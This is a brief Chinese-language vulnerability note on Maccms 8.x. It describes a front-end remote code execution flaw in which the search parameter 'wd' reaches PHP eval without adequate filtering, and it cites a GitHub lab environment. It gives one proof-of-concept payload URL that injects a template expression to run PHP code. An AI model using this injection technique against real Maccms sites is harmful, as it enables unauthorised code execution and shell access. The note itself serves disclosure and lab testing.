Maccms搜索页面搜索输入参数过滤不严谨导致前台命令执行可getshell
该漏洞主要的产生原因是CMS搜索页面搜索参数过滤不严导致直接eval执行PHP语句。
Maccms8.x
环境地址:https://github.com/yaofeifly/Maccms8.x?tab=readme-ov-file
Payload: http://10.9.75.20/index.php?m=vod-search&wd={if-A:printf(md5(827036698))}{endif-A}